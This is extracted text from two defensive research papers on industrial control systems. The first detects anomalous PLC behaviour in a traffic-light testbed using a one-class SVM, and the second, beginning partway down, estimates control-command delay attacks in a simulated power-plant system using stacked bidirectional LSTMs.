Therefore, it is not easy to shut down a PLC for forensic investigation. IV. M ACHINE LEARNING Machine learning is a method of data analysis. It builds an automated analytical model by using algorithms to learn from data iteratively. Based on the model, machine learning allows computers to find hidden insights without being explicitly programmed [10]. Supervised learning trains a model on known input and output data so that it can predict future outputs. Unsupervised learning finds hidden patterns or intrinsic structures in input data without knowing the corresponding labels of each input [11]. Semi-supervised learning falls between unsupervised learning (without any labeled training data) and supervised learning (with completely labeled training data) [7]. One-class Support Vector Machine(OCSVM) is a semi-unsupervised algorithm. A. One-class Support Vector Machine (OCSVM) In machine learning, OCSVM is an One-class classification, also known as unary classification, tries to identify objects of a specific class amongst all objects, by learning from a training set containing only the objects of that class [13] (Fig. 3). This paper utilizes OCSVM to train a model using data of normal situations (Training set), and classify PLC anomalous behavior that deviates from the trained model. This approach is suitable to deal with PLC anomalous behavior detection because OCSVM is suitable to deal with large amount of training data, since class labelling is not necessary. Also, it is relatively easy to gather training data of normal situations. On the other side, it is relatively difficult or impossible to collect data with a faulty system state. Even a faulty system state could be simulated, there is unlikely to guarantee that all the faulty state are simulated [12]. Fig. 2. PLC Inputs / Outputs connection with traffic lights 2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 581 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply. TABLE I. INSTRUCTIONS OF TRAFFIC LIGHT CONTROL SYSTEM Instruction Address Description Outputs Q 0.0 Red for pedestrians Q 0.1 Green for pedestrians Q 0.5 Red for vehicles Q 0.6 Yellow for vehicles Q 0.7 Green for vehicles Inputs I 0.0 Switch on right-hand side of street I 0.1 Switch on left-hand side of street Memory Bit M 0.0 Memory bit for switching the signal after a green request from a pedestrian Timers (on-delay timer) T 2 Duration (3 sec) of yellow phase for vehicles T 3 Duration(10 sec) of green phase for pedestrians T 4 Delay (6 sec) red phase for vehicles T 5 Duration (3 sec) of red/yellow phase for vehicles T 6 Delay (1 sec) next green request for pedestrians Fig. 3. One-class Classification V. LITERATURE REVIEW There are many research works focusing on ICS and PLC security protection and forensics after STUXNET malware attack discovered in 2010. STUXNET s target was to infect Siemens programming device (i.e., PC running Step 7 on Windows environment). The objective of the malware is to reprogram ICS by modifying code on the PLCs to make them work in a manner the attacker intended and to hide those changes from the operator of the equipment [17]. An example is the research work of Jamie et al. [22], they present a new methodology for the development of a transparent expert system for the detection of wind turbine pitch faults utilizing a data-intensive machine learning approach. 
The expert system for the classification and detection of wind turbine pitch faults, as validated by the 85.50% classification accuracy achieved. Tina Wu and Jason Nurse have proved that PLC attacker s intentions can be determined by monitoring the memory addresses of user control program [16]. They identified the memory addresses used from the program code, and then monitored and recorded the values of the addresses by PLC Logger as a file (stored with normal PLC behavior). Based on the clear file, they can determine if the PLC is running normally or being attacked. Ken Yau and KP Chow have proposed two solutions to perform PLC forensics. The first solution was that they developed a Control Program Logic Change Detector (CPLCD) [14]. It worked with a set of Detection Rules (DRs) to detect and record undesired incidents, the incidents were interfering with the normal operations of PLC. The DRs were defined based on the PLC user control program. CPLCD program worked with the defined DRs to monitor memory variables of the control program to detect PLC Control Program Change Attack and PLC Memory Read and Write Logic Attack . Their second solution was that, they proposed to capture values of relevant memory addresses used by PLC control program as a data log file. Based on the log file, supervised machine learning was applied to identify anomalous PLC operations [15]. All the solutions mentioned above are able to detect malicious behavior of a specific PLC, and some solutions use supervised machine learning. However, they are not generic solutions. Investigator must fully understand PLC control program logics before applying these solutions to determine anomalous PLC behavior. Since each PLC installed with different control programs for different applications and some programs are extremely complicated, therefore, investigators are not easy to apply the above solutions to the real PLC control systems. Furthermore, it takes time to label large set of training data when using supervised machine learning. VI. E XPERIMENTAL SETUP AND METHODOLOGY This section describes the experimental setup and the proposed methodology for identifying PLC anomalous operations. A. Experimental Setup The experiments used a Siemens S7-1212C PLC loaded with the traffic light control program (TLIGHT) (Section IIA). The values of relevant memory addresses used by TLIGHT were captured in a log file via a program using the libnodave open sources library [18]. In particular, the program monitored the PLC memory addresses over the network and recorded the values along with their timestamps. One computer was installed with Snap7 to create anomalous PLC operations by altering some values in address locations. Snap7 is an open source, 32/64 bit, multi-platform Ethernet communication suite for interfacing natively with Siemens Training Set 1 Trained Model Trained Model Test Set 2 Objects of specific class 2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 582 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply. S7 PLCs [19]. The overview of hardware experimental setup is shown in Fig. 4. Fig. 4. Overview of Hardware Experimental Setup B. 
Classifying Anomalous Behavior A machine learning technique typically splits the available dataset into two components: (i) training set for learning the properties of the data; and (ii) testing set for evaluating the learned properties of the data. The accuracy of the response prediction was evaluated based on the testing set [23]. An overview of PLC anomaly detection using OCSVM is shown in Fig 5 and the details are as follows: Step 1: To set up a simulated traffic light control system. The setup details are shown in Fig. 2. Step 2: To collect values of relevant memory addresses used by PLC program. To capture the values of relevant memory addresses used by PLC program in a log file. (Fig. 6). The memory addresses of traffic light control system are shown in Table I. The captured data in the log file was used for OCSVM model training. Step 3: To normalize the collected values as training set. To simplify the semi-supervised machine learning process, all the non-binary values of memory addresses (e.g., timers) were converted to binary values. Step 4: To train an OCSVM model by using the normalized values. To train a learning model, One-class SVM (sklearn.svm.OneClassSVM) of Scikit-learn is adopted. Scikit-learn is a free software machine learning library for the Python programming language [20]. Based on the training set of the captured data, OCSVM was applied to train a model. There are four kernel functions used in OCSVM which are Linear, Polynomial, Gaussian, and Sigmoid/Logistic. The kernels are functions used to define a similarity measure between two data points. After comparing the performance of the four kernel functions in our experiments, we found that the kernel Polynomial function provided higher accuracy of classification for the simulated traffic light control system. Polynomial Kernel: K(x,y) = (gamma*x*y + coef() ) ^ degree, the parameter settings are shown in Table II. Step 5: To create and collect PLC anomalous events for performance evaluation of the model. One computer was installed with Snap7 to create anomalous PLC operations by altering some values in address locations. Fig. 5. Overview of PLC Anomaly Detection using OCSVM Wireless AP Snap 7 Logging program PLC Switches Step 2 To collect values of relevant memory addresses used b y PLC program Step 3 To normalize the collected values as training set Step 4 To train an OCSVM model by using the normalized values Step 1 To set up a simulated traffic light control system Step 5 To create and collect PLC anomalous events for performance evaluation of the model Step 6 To evaluate the accuracy of the PLC anomaly detectio n 2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 583 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply. Fig. 6. Data log file TABLE II. INPUT PARAMETER SETTINGS OF SCIKIT -LEARN ONE-CLASS SVM (OCSVM) Para- meter description Value degree Degree of the polynomial kernel function 3 coef0 coefficients 4 nu An upper bound on the fraction of training errors and a lower bound of the fraction of support vectors. Should be in the interval (0, 1]. 0.1 gamma gamma defines how much influence a single training example. The larger the gamma is, the closer other examples must be to be affected. 0.1 Test sets were created by capturing the values of the PLC memory addresses while performing the simulated attacks. The test sets contained normal and anomalous PLC events. 
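Step 4 can be reproduced with a few lines of scikit-learn. The following is a minimal sketch (the data-loading step and the file names are assumptions; the kernel type and parameter values follow Table II):

import numpy as np
from sklearn.svm import OneClassSVM

# Normalized snapshots of the monitored memory addresses captured in Steps 2-3
# (file names are hypothetical).
X_train = np.loadtxt("tlight_train_normal.csv", delimiter=",")
X_test = np.loadtxt("tlight_test1.csv", delimiter=",")

# Polynomial kernel with the parameter values listed in Table II.
model = OneClassSVM(kernel="poly", degree=3, coef0=4, nu=0.1, gamma=0.1)
model.fit(X_train)

# predict() returns +1 for points consistent with the learned normal profile
# and -1 for points flagged as anomalous.
labels = model.predict(X_test)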
Step 6: To evaluate the accuracy of the PLC anomaly detection. To evaluate the accuracy of the One-class SVM classification, one training set and three test sets were collect from the simulated traffic light control system. The trained model was evaluated by sklearn.metrics [24] and the classification results with five performance metrics are shown in Table III. The brief descriptions of the metrics are as follows: Accuracy: The accuracy is the ratio (tp + tn) / (p + n) where tp is the number of true positives and fn is the number of false negatives. P is the number of real positive cases in the data and n is the number of real negative cases in the data. Precision: The precision is the ratio tp / (tp + fp) where tp is the number of true positives and fp is the number of false positives. The precision is intuitively the ability of the classifier not to label as positive a sample that is negative. The best value is 1 and the worst value is 0. Recall: The recall is the ratio tp / (tp + fn) where tp is the number of true positives and fn is the number of false negatives. The recall is intuitively the ability of the classifier to find all the positive samples. The best value is 1 and the worst value is 0. F1: Score can be interpreted as a weighted average of the precision and recall, where an F1 score reaches its best value at 1 and worst score at 0. AUC: Area Under the Curve (AUC) is prediction scores which measured by the area under the ROC curve. An area of 1 represents a perfect test; an area of 0.5 represents a worthless test. VII. D ISCUSSION In the experiment, we made an assumption that the training set data collected from the traffic light system was in normal operations (without any anomalous events). This assumption is not unreasonable as we can collect data of normal behavior of the PLC during testing and maintenance. From the experimental results, high accuracy and high AUC of PLC anomalous operation detection were obtained. Since our logging program captures memory addresses of PLC with time stamps, OCSVM together with the time stamps information can help forensic investigators to carry out investigation efficiently. OCSVM was able to detect the simulated traffic light anomalous behavior in a dataset after OCSVM model was trained. Since each dataset was recorded with time stamps, we could know the date and time about the PLC anomalous events. According to the time stamps and the values of memory addresses in the dataset, the scope of investigation can be narrowed down. For example, if any firmware or user control program was updated, or any attack during a particular period of time, the proposed solution can identify the date and time about the anomalous events. According to the experiments, we found that it is important to select a correct kernel function with appropriate values of the function parameters in order to obtain a more accurate result of PLC anomaly detection. In our experiments, we chose kernel function Polynomial and adjusted the parameter values as Table II for classifying anomalous operations of the simulated traffic light system. As different control systems have different operational behavior, therefore, we believe that kernel type and values of parameters may be different for different kinds of PLC control systems. Comparing with supervised machine learning for PLC anomaly detection, OCSVM may be a better solution when the training set data is large and complicated because the training data for OCSVM is not necessary to be labelled. 
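The metrics reported in Step 6 are available directly from sklearn.metrics, which is what the evaluation relies on; a minimal sketch is shown below (the +1/-1 label convention and the use of decision_function scores for the AUC are assumptions):

from sklearn.metrics import (accuracy_score, precision_score, recall_score,
                             f1_score, roc_auc_score)

def evaluate(y_true, y_pred, scores):
    """y_true/y_pred use +1 for normal and -1 for anomalous events;
    scores are continuous outputs such as OneClassSVM.decision_function()."""
    return {
        "Accuracy": accuracy_score(y_true, y_pred),
        "Precision": precision_score(y_true, y_pred),
        "Recall": recall_score(y_true, y_pred),
        "F1": f1_score(y_true, y_pred),
        "AUC": roc_auc_score(y_true, scores),
    }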
Class labelling is not an easy task for large set of data 2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 584 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply. because it is time consuming and always need to be performed by control system s experts. VIII. CONCLUSION AND FUTURE WORK To overcome the challenges of PLC protection and forensic investigation, this paper proposes to use semi-supervised machine learning, One-class SVM (OCSVM), to detect PLC anomalous behavior based on the captured values of PLC memory addresses. Our experiment demonstrates that our solution is feasible and practical to apply to the traffic light control system. This paper is an initial step of applying semi-supervised machine learning for PLC anomaly detection. In future, we will evaluate the feasibility and increase the accuracy to detect PLC anomalous behavior by applying semi-supervised algorithm on various PLC applications in ICS. In addition, we will try to create a generic model for PLC anomaly detection even when the PLC control program is not provided. TABLE III. OCSVM CLASSIFICATION RESULTS OF TRAFFIC LIGHT CONTROL SYSTEM R EFERENCES [1] Irfan Ahmed, Sebastian Obermeier and Martin Naedele, Golen G. Richard III: SCADA System: Challenges for Forensics Investigations, IEEE Computer, Vol. 45 No. 12, pp 44 51, USA, 2012. [2] T. Spyridopoulos , T. Tryfonas , J. May ,Incident analysis & digital forensics in SCADA and industrial control systems, System Safety Conference incorporating the Cyber Security Conference, 8th IET International, 2013. [3] Dillon Beresford, Exploiting Siemens Simatic S7 PLCs, Black Hat USA, 2011. [4] W. Bolton, Programmable Logic Controllers (4th Edition), 2006. [5] Keith Stouffer,Victoria Pillitteri, Suzanne Lightman, Marshall Abrams, Adam Hahn, Guide to Industrial Control Systems (ICS) Security, NIST Special Publication 800-82 Revision 2, U.S. Department of Commerce, 2015. [6] Siemens, SIMATIC S7-300 Programmable Controller Quick Start, Primer, Preface, C79000-G7076-C500-01, Nuremberg, Germany, 1996. [7] Semi-supervised learning (https://en.wikipedia.org/wiki/Semi-supervised_learning), 2017. [8] H. Patzlaff, D 7.1 Preliminary Report on Forensic Analysis for Industrial Systems, CRISALIS Consortium, Symantec, Sophia Antipolis, France, 2013. [9] Fabro, M: Recommended Practice: Creating Cyber Forensic Plan for Control Systems, Department of Homeland Security (2008), Idaho National Laboratory (INL), USA, 2008. [10] Machine Learning: What it is and why it matters (www.sas.com/it_it/insights/analytics/machine-learning.html), 2017. [11] Machine Learning in MATLAB (www.mathworks.com/help/stats/machine-learning-in-matlab.html), 2017. [12] Introduction to One-class Support Vector Machines (rvlasveld.github.io/blog/2013/07/12/introduction-to-one-class- support-vector-machines/), Last accessed on 2 May 2017, 2017. [13] One-class classification.com (en.wikipedia.org/wiki/One-class_classification), 2017. [14] Ken Yau and Kam-Pui Chow, PLC Forensics based on control program logic change detection, Journal of Digital Forensics, Security and Law, Vol. 9(2), 2015. [15] Ken Yau and Kam-Pui Chow, Detecting Anomalous Programmable Logic Controller Events using Machine Learning, (to be appeared in the proceedings of) The 13th Annual IFIP WG 11.9 International Conference on Digital Forensics, Orlando, FL., February 2017. [16] Tina Wu and Jason R.C. 
Nurse, Exploring the use of PLC debugging tools for digital forensic investigations on SCADA system, Journal of Digital Forensics, Security and Law, Vol. 9(2), 2015. [17] Nicolas Falliere, Liam O Murchu, and Eric Chien: W32.Stuxnet Dossier, Version 1.4, Symantec Corporation, 2011. [18] T. Hergenhahn, libnodave (sourcefor ge.net/projects/libnodave), 2014. [19] D. Nardella, Step 7 Open Source Ethernet Communication Suite, Bari, Italy (snap7.sourceforge.net), 2016. [20] sklearn.svm.OneClassSVM (scikit- learn.org/stable/modules/generated/sklearn.svm.OneClassSVM.html), 2017. [21] Novelty and Outlier Detection (scikit- learn.org/stable/modules/outlier_detection.html#outlier-detection), 2017. [22] Godwin, J.L. and Matthews, P.C. and Watson, C., Classification and detection of electrical control system faults through SCADA data analysis, in Chemical engineering transactions. Volume 33. , pp. 985- 990, 2013. [23] scikit-learn Project, An Introduction to Machine Learning with scikit-l earn (scikit-learn.org/stable/tutorial/basic/tutorial.html), 2016. [24] sklearn.metrics: Metrics (scikit-learn.org/stable/modules/classes.html#sklearn-metrics-metrics), 2016. [25] Katherine Heller, Krysta Svore, Angelos D. Keromytis, Salvatore Stolfo, One Class Support Vector Machines for Detecting Anomalous Windows Registry Accesses, Columbia University Academic Commons, 2003. No. of Rec Accuracy Precision Recall F1 AUC Training Set 41580 0.96 1 0.96 0.98 n/a Test Set 1 5000 0.78 1 0.78 0.88 0.89 Test Set 2 7000 0.75 1 0.75 0.86 0.83 Test Set 3 13130 0.82 1 0.82 0.90 0.88 2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 585 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply.
Learning-Based_Time_Delay_Attack_Characterization_for_Cyber-Physical_Systems.pdf
The cyber-physical systems (CPSes) rely on com- puting and control techniques to achieve system safety and reliability. However, recent attacks show that these techniques are vulnerable once the cyber-attackers have bypassed air gaps. The attacks may cause service disruptions or even physical damages. This paper designs the built-in attack characterization scheme for one general type of cyber-attacks in CPS, which we call time delay attack , that delays the transmission of the system control commands. We use the recurrent neural networks in deep learning to estimate the delay values from the input trace. Speci cally, to deal with the long time-sequence data, we design the deep learning model using stacked bidirectional long short- term memory (LSTM) units. The proposed approach is tested by using the data generated from a power plant control system. The results show that the LSTM-based deep learning approach can work well based on data traces from three sensor measurements, i.e., temperature, pressure, and power generation, in the power plant control system. Moreover, we show that the proposed approach outperforms the base approach based on k-nearest neighbors. I. I NTRODUCTION The cyber-physical system (CPS) is a complex system com- posed of physical systems (e.g., power grids) and information and communication technologies (ICTs). The extensive use of ICTs can help improve system performance, but it can also be leveraged by the attackers to launch cyberattacks on the CPSes. So far, most cybersecurity solutions for CPSes have relied on air gaps or rewalls that can isolate the public network and the ICT components in CPSes. However, recently, due to the stepping stone attacks [1] and insiders attacks [2], this method is questionable. For example, the Dragon y attack [3] has breached the isolation of ICTs and the physical system in the power grids by compromising a third-party virtual private network software vendor. After the breaching, techniques like in Stuxnet [4] can be used to inject false control command to damage the system. Moreover, like the VPNFilter botnet created by infecting more than half a million routers using malware in 2018 [5], the attacker can also leverage the widespread IoT devices to build a botnet to launch distributed denial-of-service attacks or compromise devices in the network. The anomalies of CPSes, i.e., the unusual behaviors under normal operation, which includes the aforementioned possible security incidents as well as the system faults, operator errors and so on, can be harmful to the system. Thus, in this paper, we study the characterization of one general anomaly on the CPS with closed-loop control [6] [8], which we call time delayattack. It can be launched by the adversary that maliciously delays the transmissions of control command packets without altering the content. Different from conventional false data injection (FDI) attack, where the adversary needs to break the complicated cryptographic protection, the delay attack can be easily implemented by compromising routers or jamming the communication networks through the aforementioned malware infection. For many CPSes, the timely execution of the control command is essential. The delayed control command can degrade the system performance or even damage the system. If the attack characterization algorithm can estimate the length of delay ef ciently, the control center can assess the attack impact more accurately and apply proper mitigation strategies to avoid the harmfulness to the system [9]. 
In the common anomaly or time delay attack detec- tion/characterization, existing studies rst build the mathemat- ical model of the system and then verify the new data against the system model to detect or characterize the attack [10] [12]. However, for CPSes, constructing the accurate models are challenging due to the high complexity of physical processes. In this paper, we propose to use deep learning (DL) techniques to estimate the introduced time delay in CPSes. With DL, we do not need the full knowledge of the CPSes. Instead, we can build the DL model from the system historical data. Speci cally, in this paper, we use the recurrent neural network (RNN) consisting of long short-term memory (LSTM) units as the DL model for learning the length of delay in the attack. We evaluate our approaches in a power plant control system (PPCS), which is a typical CPS with the closed-loop control system. In the PPCS, the characterization algorithm has to keep tracking the long time-sequence sensor measurements, which is challenging for the DL technique. Although RNN is used for dealing with time sequence signals, it is challenging to work well in processing very long sequences if the DL algorithm is not properly designed. To address the above chal- lenge, we rst formulate the time delay attack characterization as a regression problem, i.e., estimating delay values, and then propose one novel LSTM-based DL approach. Speci cally, we use the bidirectional LSTM (BLSTM) units to construct the RNN network for long sequences. Moreover, we also design the format of the input data to improve the model performance in DL. The DL approach can ef ciently estimate the length of the delay. We also compare the performance with one benchmark approach, the k-nearest neighbors (kNN) approach in the PPCS. 12019 IEEE International Conference on Communications , Control, and Computing Technologies for Smart Grids (SmartGridComm) 978-1-5386-8099-5/19/$31.00 2019 IEEEAuthorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:28 UTC from IEEE Xplore. Restrictions apply. I I. R ELATED WORK Researchers have proposed various approaches to model- based anomaly detection for CPSes [10] [12], However, these approaches need to model the highly complicated physical process and also require the information of system setting and the operation data. In what follows, we review the learning- based approaches. In [13], deep neural network (DNN) and support vector machine (SVM) are constructed to detect the anomaly in a water treatment system testbed. In the DNN, one LSTM layer is connected to the feedforward layers to deal with the time series data. In addition, the widely used one-class SVM is applied for detection. The results show DNN works better in terms of precision. Moreover, for the same water testbed, the work [14] combines LSTM and cumulative sum to detect the deviations corresponding to anomalies in the rst subsystem of the testbed. However, none of them considers the signal delay in the anomaly scenarios. In [15], a two-level anomaly detection framework based on network packet signatures and DL techniques is proposed in industrial control systems (ICS). They rst construct a signature database for normal behaviors of network packets by observing the communications in the system. Then the signature database is included into a Bloom lter to nd anomalous network packets. 
Moreover, in the second level, to find out the temporal dependencies between consecutive packets, LSTM is used to learn the most likely packet signatures from the previously seen network packets. However, in our problem every packet is legitimate and carries a valid signature, so this approach cannot work. Researchers have also worked on the delay attack in CPS and ICS systems [11], [12]. However, these approaches are based on classic control theories that may not address the high complexity of CPSes [16]. In [12], a modified controller with a time-delay estimator is proposed to estimate the time delay in the feedback control loop of load frequency control in the power system. However, the approach is only applicable to simplified linear time-invariant systems under state feedback control. In [16], the delay attack is implemented in an ICS testbed on both the forward and feedback channels to observe its effect, and a recursive least squares method is proposed to detect the delay attack in the testbed. But this work considers a continuous process, and the approach can only estimate specific delay values, i.e., the ones chosen in the model setting.

III. BACKGROUND OF BLSTM

Different from conventional neural networks, which assume that all inputs and outputs are independent, an RNN performs its task with the output depending on the previous computations, as illustrated in Fig. 1(a). An LSTM network is a typical RNN composed of LSTM units [17]. It has been successfully applied to many sequence learning scenarios such as natural speech recognition [18] and machine translation [19]. LSTM often outperforms the conventional RNN due to its capability to learn long-term dependencies [20]. In an LSTM network, each LSTM cell (i.e., each memory module A in Fig. 1(a)) has a complex structure so that it can remember values over arbitrary time intervals.

Fig. 1: Illustrations of RNN and LSTM. (a) An unrolled recurrent neural network. (b) A typical LSTM unit. (c) The unfolded architecture of bidirectional LSTM.

Each cell includes the input gate, the output gate and the forget gate. These gates can be regarded as conventional artificial neurons in the neural network, computing an activation function of a weighted sum. They decide how much old information is to be remembered in the new state, what information to output, and what information to pass to the next cell. Denote the input vector to the LSTM as xn, the hidden state from the previous step as hn-1, and the output vector as hn. For a typical LSTM unit shown in Fig. 1(b), the implementation of the LSTM unit can be represented by the following equations:

fn = σ(Wf hn-1 + Uf xn + bf),
in = σ(Wi hn-1 + Ui xn + bi),
C̃n = tanh(WC hn-1 + UC xn + bC),
Cn = fn ⊙ Cn-1 + in ⊙ C̃n,
on = σ(Wo hn-1 + Uo xn + bo),
hn = on ⊙ tanh(Cn),

where σ is the sigmoid function, tanh is the hyperbolic tangent function, fn, in, on and Cn are respectively the forget gate, input gate, output gate and cell state vector, C̃n is the candidate cell state, Wz, Uz, bz, where z ∈ {f, i, o, C}, are the parameters to be learned, and ⊙ is the element-wise product. Due to its complex structure, the LSTM network can memorize information over long time steps and then use this information for predicting the behavior in the next time step.
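A single step of these equations can be written out in a few lines of NumPy (a minimal sketch for illustration, not the implementation used in the paper; the params dictionary holding the learned weights is an assumption):

import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def lstm_step(x_n, h_prev, c_prev, params):
    """One LSTM step following the gate equations above.
    params holds the learned matrices W_*, U_* and biases b_* for * in {f, i, o, C}."""
    f_n = sigmoid(params["Wf"] @ h_prev + params["Uf"] @ x_n + params["bf"])
    i_n = sigmoid(params["Wi"] @ h_prev + params["Ui"] @ x_n + params["bi"])
    c_tilde = np.tanh(params["WC"] @ h_prev + params["UC"] @ x_n + params["bC"])
    c_n = f_n * c_prev + i_n * c_tilde          # element-wise products
    o_n = sigmoid(params["Wo"] @ h_prev + params["Uo"] @ x_n + params["bo"])
    h_n = o_n * np.tanh(c_n)
    return h_n, c_n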
Based on the basic LSTM model, there is a variant called bidirectional LSTM (BLSTM), which is motivated by the bidirectional RNN [21]. In BLSTM, the data sequence is processed in both the forward and backward directions by two hidden layers, which are connected to the same output layer. It has been shown that the bidirectional network often outperforms the unidirectional one in many applications, for example speech recognition [18] and traffic prediction [22]. We illustrate an unfolded BLSTM network in Fig. 1(c). It contains one forward LSTM layer, one backward LSTM layer, and the functions that combine their outputs. The forward layer processes the input data sequence consecutively from position 1 to n, producing the forward outputs →hi, where i = 1, 2, …, n. The backward layer processes the data sequence in the reverse manner, from n to 1, producing the backward outputs ←hi, where i = n, n-1, …, 1. In both layers, the calculation is conducted by the standard LSTM cells shown in Fig. 1(b). Different from the unidirectional LSTM, the output is calculated as yi = φ(→hi, ←hi), where the φ function combines the two output sequences. It can be a different type of function depending on the system structure, e.g., a summation, average or multiplication function.

IV. TIME DELAY ATTACK IN PPCS

This section defines the system model and the adversary's threat model for the time delay attack in the PPCS.

A. System Model

We consider a discrete-time CPS control system, which consists of sensors, actuators, and controllers (e.g., PLCs). Sensors convert the physical parameters into sensor measurements, which are used as the input for the controllers to make control decisions. After that, the control commands from the controllers are transmitted to the actuators, which change the system state accordingly. The system is subjected to various disturbances, such as measurement noises, setpoint changes, etc. In this paper, we specifically discuss one type of CPS control system, the power plant control system, whose structure is illustrated in Fig. 2; the model is from ThermoPower [23], an open-source library based on Modelica.

Fig. 2: A power plant control system.

This PPCS has three input signals: the power control signal, the gas flow rate signal and the void fraction control signal. The void fraction, also known as porosity, is an important parameter characterizing two-phase fluid flow, especially gas-liquid flow. Both the power controller and the void fraction controller adopt the proportional-integral-derivative (PID) control algorithm. Moreover, the disturbance in this PPCS comes from the additive random noise in the power generation measurements. In the PPCS, we can collect three types of sensor measurements: the temperature TP, the pressure P and the generated electricity PE. Assuming the trace length is T, by observing the measurements of TP, P and PE we obtain three traces zTP(t), zP(t) and zPE(t), where t = 1, 2, …, T.

B. Threat Model

Similar to the work in [9], the time delay attack is formally described as follows.
The adversary aims to delay the control command from the controller. For example, in Fig. 2, the control command from the power controller is delayed. Let $x(t)$ denote the control signal generated and transmitted by the controller in the $t$th time slot. During the transmission, packets are maliciously delayed by $\tau$ time slots. Thus, in the $(t+\tau)$th time slot, the data $x(t)$ arrives at the actuator. Since this is a discrete-time control system, the delay length $\tau$ is an integer. Moreover, in the time delay attack, the adversary does not modify the content of the transmitted data packet. The attack can be launched by jamming communication channels using an industrial IoT botnet or even through a compromised router. Note that a delay can also exist due to natural communication latency even when there is no adversary. In this paper, we assume the clocks of the controller and the actuator are not synchronized. Otherwise, the security of the clock synchronization itself would need to be ensured, which cannot be achieved by conventional security measures such as cryptographic authentication and encryption and thus requires sophisticated solutions, as shown in [2]. In this paper, we propose an approach to estimate the delay in the absence of a secure clock synchronization mechanism.

V. LEARNING-BASED TIME DELAY ATTACK CHARACTERIZATION

In this section, we first formulate the time delay attack characterization problem and then propose the learning-based approach to solve it.

A. Problem Formulation

Due to the delayed control command, the actuator always executes an outdated operation, which may affect the system's normal running status and, in the worst case, even cause damage to the system. Therefore, the characterization scheme should keep monitoring the system status and, once the attack happens, estimate the delay length $\tau$ as soon as possible, so that this information can be used to assess and mitigate the impact of the attack before it is eliminated. In this discrete-time PPCS, the delay values are integers and can take any value. To predict the delay values using learning techniques, we formulate the characterization problem as a regression problem. The input to the regression algorithm is the long time-sequence data containing the sensor measurements of $T_P$, $P$ and $P_E$ from the PPCS, as introduced in Section IV-A. The output is the delay value of the attack. We round the output of the regression to an integer. According to existing research, the launch time of an FDI attack in the power system can be detected by analyzing the frequency changes [24]. In our setting, if we treat the time delay attack as an FDI attack, i.e., the data packet at the $(t+\tau)$th time slot is modified to be the one at time slot $t$, then the existing result can be applied to detect the attack launch time. Thus, in this paper, we focus only on the more advanced problem of characterizing the delay values and assume the attack launch time is obtained using the technique in [24]. Since we can know the attack launch time, once the attack happens, we use the trace containing the data before and after the attack launch time as the input to predict the delay value.
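As a concrete illustration of this threat model, the following Python sketch applies a $\tau$-slot delay to a discrete control trace starting at an assumed attack launch slot. The signal, delay value and launch time are hypothetical and only mimic the behavior described above: the packet content is untouched, only its arrival slot changes.

```python
import numpy as np

def apply_delay_attack(x, tau, t_attack):
    """Delay a discrete-time control signal x(t) by tau slots from t_attack onward.

    Before the attack the actuator receives x(t); afterwards it receives the
    stale value x(t - tau). All numbers here are illustrative only.
    """
    x_rx = np.copy(x)
    for t in range(t_attack, len(x)):
        x_rx[t] = x[max(t - tau, 0)]   # stale command held back by tau slots
    return x_rx

# Toy example: a ramping control command, attack at slot 500, tau = 7 slots.
x = np.linspace(0.0, 1.0, 1000)
x_delayed = apply_delay_attack(x, tau=7, t_attack=500)
print(x[500], x_delayed[500])  # the actuator now sees the value from slot 493
```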
In the following, we introduce the details of the learning-based approach.

B. LSTM-based DL for Time Delay Characterization

Recent work in [18], [22] has shown that DNNs can build up progressively higher-level representations of data. Motivated by the DNN structure, we stack BLSTM hidden layers on top of each other, with the output of one layer fed as the input to the next BLSTM layer, creating a deep BLSTM structure. This deep network contains three hidden layers composed of three stacked BLSTM layers that abstract features from the time-sequence data. They are followed by one multilayer perceptron (MLP) layer for regression. Note that, in the last BLSTM layer, to decrease the number of hidden nodes in the following MLP, we only return the last output of the output sequence, which is the concatenation of the results from the first and last BLSTM units in that layer. Moreover, to mitigate overfitting, we add a dropout layer after each hidden layer. The deep BLSTM network structure is shown in Fig. 3.

[Fig. 3: The deep BLSTM network structure. It contains three stacked BLSTM layers and the MLP layer.]

In our problem, the input to the LSTM network is a very long time sequence (up to 600 data points for each input trace), which is challenging for an LSTM network. To better use the LSTM network, instead of naively feeding the raw long trace to the network, we pre-process the input data. We construct an input matrix where each row contains all three signals, i.e., $z_{T_P}$, $z_P$, $z_{P_E}$. To capture the trend and the seasonality of the time-series data, we truncate each trace of $T_P$, $P$ and $P_E$ into $p$ pieces, each of length $q$. After truncating the data, the input matrix can be expressed as

$$\begin{pmatrix} z^{T_P}_0, \ldots, z^{T_P}_{q-1}, & z^{P}_0, \ldots, z^{P}_{q-1}, & z^{P_E}_0, \ldots, z^{P_E}_{q-1} \\ z^{T_P}_q, \ldots, z^{T_P}_{2q-1}, & z^{P}_q, \ldots, z^{P}_{2q-1}, & z^{P_E}_q, \ldots, z^{P_E}_{2q-1} \\ \vdots & \vdots & \vdots \\ z^{T_P}_Q, \ldots, z^{T_P}_{pq-1}, & z^{P}_Q, \ldots, z^{P}_{pq-1}, & z^{P_E}_Q, \ldots, z^{P_E}_{pq-1} \end{pmatrix}, \quad (1)$$

where $Q = (p-1)q$. After obtaining this $p \times 3q$ input matrix (the length of each input trace is $pq$), each row of the matrix is fed to one BLSTM cell. The features abstracted by the stacked BLSTM layers are then sent to the dense layer for regression.

VI. EVALUATION

A. Settings and Metrics

